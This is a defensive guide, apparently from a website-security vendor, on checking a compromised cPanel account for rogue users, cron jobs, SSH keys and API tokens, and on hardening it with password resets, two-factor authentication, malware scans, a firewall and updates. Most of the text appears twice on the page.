How to fix a hacked cPanel account
cPanel is a popular hosting panel, and without proper security measures & configurations it can be vulnerable to attacks. The guide will help you assess if your cPanel account is compromised, and how you can further secure your cPanel account.
If you use WHM, run a scan using Security Advisor to identify server level security issues such as outdated software, poor password strength, misconfigurations etc. This interface runs a security scan on your server, and it advises you about how to resolve any security issues that it finds.
Log into WHM as the root user
Type advisor in the search field
Click the Security Advisor link under Security Center
The cPanel Security Advisor will then scan your server and provide a list of security suggestions or warnings
To re-scan the site, click the Scan Again button
Security suggestions will vary from red for important issues, yellow for medium security issues, blue for informational warnings, and green if it passes security checks.
If the server is compromised, an attacker may add additional users to your cPanel account so that they can keep accessing your server.
Open Preferences > User Manager in your cPanel account
Go through the list of users to identify any unknown accounts which were not created by you
Once you've verified that the accounts were not created by anyone in your team, delete the unknown cPanel accounts
Please use the Delete the User’s Home Directory with extreme caution. If you select this option, the data include the user’s FTP folder will be removed and will be unrecoverable. If the FTP account that you delete can access the public_html directory, then checking this option will automatically remove the public_html directory and all of its contents, which includes all your website files. This will break your website.
To evade security scanners, and easily re-infect your server - an attack may create malicious cron jobs on your server. The malicious code runs periodically to re-infect the site, mine crypto currency or perform other dangerous actions.
Open Advanced > Cron Jobs in your cPanel account
Check for any unknown or suspicious Cron Jobs which were not created by you
Once you've verified that the Cron Job was not created by anyone in your team, delete the Cron Job
Similar to adding unknown cPanel user accounts, a hacker may create
Open Security > SSH Access in your cPanel account
Click on Manage SSH Keys to see the list of SSH keys created for the account
Check for any unknown or illegal SSH keys which were not created by you
Once you've verified that the SSH keys were not created by anyone in your team, delete the SSH keys
Similar to creating an unknown user, hackers may also create an API token for an existing user to login and access the cPanel account.
Open Security > Manage API Tokens in your cPanel account
Check for any unknown or illegal API tokens which were not created by you
Once you've verified that the API tokens were not created by anyone in your team, delete the API token
If your server is not hardened, hackers may exploit vulnerabilities to compromise the password of your cPanel account and login. As a precaution please change the password of ALL cPanel users.
You should immediately change the password of the root user account
Login to WHM
Navigate to the account function by clicking on the option Account Function
Click on the button Force Password Change
By clicking on the above option the screen will navigate to a page which listing all of the available users, you can select the whole account or as per the need. Then click on the option Submit
Now the Force Password Change option has been enabled for the selected users. When the user login to the cPanel account, the users will get into the page by prompting a message that the administrator has requested you to change your password.
(s)FTP and SSH allow secure file transfer and remote logins to the server over the internet. If an attacker get access to this account, they can view/edit/delete all website files in the cPanel account. Change the credentials periodically to prevent misuse.
Open Files > FTP Accounts in your cPanel account
Select Change Password in the Actions column beside the FTP account that needs a password reset
Type in your new password and click Change Password
To prevent misuse of your account, enable Two-factor authentication (2FA) to your cPanel. After you enter your password, you must enter a security code. Even if your account password is compromised, an attacker will not be able to login to cPanel without the 2FA code only available in your smartphone.
Enable Two-Factor authentication in WHM
Login to WHM as the root user
Navigate to Home > Security Center > Two-Factor Authentication
Ensure that the toggle button shows that Two-Factor Authentication is enabled
Enable Two-Factor Authentication for a cPanel User
Login to the cPanel account
Open Security > Two Factor Authentication in your cPanel account
Follow the steps on the page to enable Two Factor authentication
It is important to scan all the website files & database for malicious files a hacker may have created or modified. There will be two types of scans we will be running:
Scan website files using the Malware Scanner in the Astra Website Protection plugin
Scan server files using Virus Scanner in cPanel
Install ClamAV Scanner plugin in WHM
Login to WHM as the root user
Navigate to Home > cPanel > Manage Plugins
Install the ClamAV Scanner plugin
Scan the website using ClamAV in cPanel
Open Advanced > Virus Scanner in your cPanel account
Select Scan Entire Home Directory and start a scan
If the scanner flags any files, review each file and delete the malicious files
If there are vulnerabilities in the application that is running on the server, they may be exploited by hackers to upload files to your server and gain access to the cPanel account. You should get a Vulnerability Scan & Pentest of all the applications running on the server, to identify such vulnerabilities in the application.
To protect your server and applications running on it, it is important to enable a Web Application Firewall (WAF) to stay protected against attacks such as SQL Injection (SQLi), Cross-site Scripting (XSS) etc.
Install Astra Website Protection plugin for each website running on your cPanel account
For non PHP websites, enable ModSecurity on the server
To protect your server from brute-force attacks, configure cPHulk. It will protect the cPanel, WHM, FTP, SSH & mail services.
So that a malware infection does not spread, only run 1 website per cPanel account. Because of the file permissions & ownership - if one site gets infected, it can easily infect the other websites installed on the same cPanel account. Create additional cPanel accounts via WHM, or speak to your hosting provider.
To benefit from latest security patches, we strongly recommend that you regularly update cPanel & WHM on all of your servers.
How to know if my cPanel account is hacked
Run a scan in WHM Security Advisor
If you use WHM, run a scan using Security Advisor to identify server level security issues such as outdated software, poor password strength, misconfigurations etc. This interface runs a security scan on your server, and it advises you about how to resolve any security issues that it finds.
Log into WHM as the root user
Type advisor in the search field
Click the Security Advisor link under Security Center
The cPanel Security Advisor will then scan your server and provide a list of security suggestions or warnings
To re-scan the site, click the Scan Again button
Security suggestions will vary from red for important issues, yellow for medium security issues, blue for informational warnings, and green if it passes security checks.
Check for unknown cPanel User Accounts
If the server is compromised, an attacker may add additional users to your cPanel account so that they can keep accessing your server.
Open Preferences > User Manager in your cPanel account
Go through the list of users to identify any unknown accounts which were not created by you
Once you've verified that the accounts were not created by anyone in your team, delete the unknown cPanel accounts
Please use the Delete the User’s Home Directory with extreme caution. If you select this option, the data include the user’s FTP folder will be removed and will be unrecoverable. If the FTP account that you delete can access the public_html directory, then checking this option will automatically remove the public_html directory and all of its contents, which includes all your website files. This will break your website.
Check for Malicious Cron Jobs
To evade security scanners, and easily re-infect your server - an attack may create malicious cron jobs on your server. The malicious code runs periodically to re-infect the site, mine crypto currency or perform other dangerous actions.
Open Advanced > Cron Jobs in your cPanel account
Check for any unknown or suspicious Cron Jobs which were not created by you
Once you've verified that the Cron Job was not created by anyone in your team, delete the Cron Job
Check for unknown SSH accounts
Similar to adding unknown cPanel user accounts, a hacker may create
Open Security > SSH Access in your cPanel account
Click on Manage SSH Keys to see the list of SSH keys created for the account
Check for any unknown or illegal SSH keys which were not created by you
Once you've verified that the SSH keys were not created by anyone in your team, delete the SSH keys
Check for unknown API Tokens
Similar to creating an unknown user, hackers may also create an API token for an existing user to login and access the cPanel account.
Open Security > Manage API Tokens in your cPanel account
Check for any unknown or illegal API tokens which were not created by you
Once you've verified that the API tokens were not created by anyone in your team, delete the API token
How to harden your cPanel account
Change Password of all cPanel & WHM users
If your server is not hardened, hackers may exploit vulnerabilities to compromise the password of your cPanel account and login. As a precaution please change the password of ALL cPanel users.
You should immediately change the password of the root user account
Login to WHM
Navigate to the account function by clicking on the option Account Function
Click on the button Force Password Change
By clicking on the above option the screen will navigate to a page which listing all of the available users, you can select the whole account or as per the need. Then click on the option Submit
Now the Force Password Change option has been enabled for the selected users. When the user login to the cPanel account, the users will get into the page by prompting a message that the administrator has requested you to change your password.
Change password of all FTP/SFTP/SSH accounts
(s)FTP and SSH allow secure file transfer and remote logins to the server over the internet. If an attacker get access to this account, they can view/edit/delete all website files in the cPanel account. Change the credentials periodically to prevent misuse.
Open Files > FTP Accounts in your cPanel account
Select Change Password in the Actions column beside the FTP account that needs a password reset
Type in your new password and click Change Password
Enable two-factor authentication (2FA)
To prevent misuse of your account, enable Two-factor authentication (2FA) to your cPanel. After you enter your password, you must enter a security code. Even if your account password is compromised, an attacker will not be able to login to cPanel without the 2FA code only available in your smartphone.
Enable Two-Factor authentication in WHM
Login to WHM as the root user
Navigate to Home > Security Center > Two-Factor Authentication
Ensure that the toggle button shows that Two-Factor Authentication is enabled
Enable Two-Factor Authentication for a cPanel User
Login to the cPanel account
Open Security > Two Factor Authentication in your cPanel account
Follow the steps on the page to enable Two Factor authentication
Run a malware scan
It is important to scan all the website files & database for malicious files a hacker may have created or modified. There will be two types of scans we will be running:
Scan website files using the Malware Scanner in the Astra Website Protection plugin
Scan server files using Virus Scanner in cPanel
Install ClamAV Scanner plugin in WHM
Login to WHM as the root user
Navigate to Home > cPanel > Manage Plugins
Install the ClamAV Scanner plugin
Scan the website using ClamAV in cPanel
Open Advanced > Virus Scanner in your cPanel account
Select Scan Entire Home Directory and start a scan
If the scanner flags any files, review each file and delete the malicious files
Get a Pentest of the hosted applications
If there are vulnerabilities in the application that is running on the server, they may be exploited by hackers to upload files to your server and gain access to the cPanel account. You should get a Vulnerability Scan & Pentest of all the applications running on the server, to identify such vulnerabilities in the application.
Enable a Web Application Firewall (WAF)
To protect your server and applications running on it, it is important to enable a Web Application Firewall (WAF) to stay protected against attacks such as SQL Injection (SQLi), Cross-site Scripting (XSS) etc.
Install Astra Website Protection plugin for each website running on your cPanel account
For non PHP websites, enable ModSecurity on the server
Enable Brute-force protection
To protect your server from brute-force attacks, configure cPHulk. It will protect the cPanel, WHM, FTP, SSH & mail services.
Run only 1 website per cPanel account
So that a malware infection does not spread, only run 1 website per cPanel account. Because of the file permissions & ownership - if one site gets infected, it can easily infect the other websites installed on the same cPanel account. Create additional cPanel accounts via WHM, or speak to your hosting provider.
Regularly update cPanel & WHM on all of your servers
To benefit from latest security patches, we strongly recommend that you regularly update cPanel & WHM on all of your servers.
Updated on: 20/08/2022
Thank you!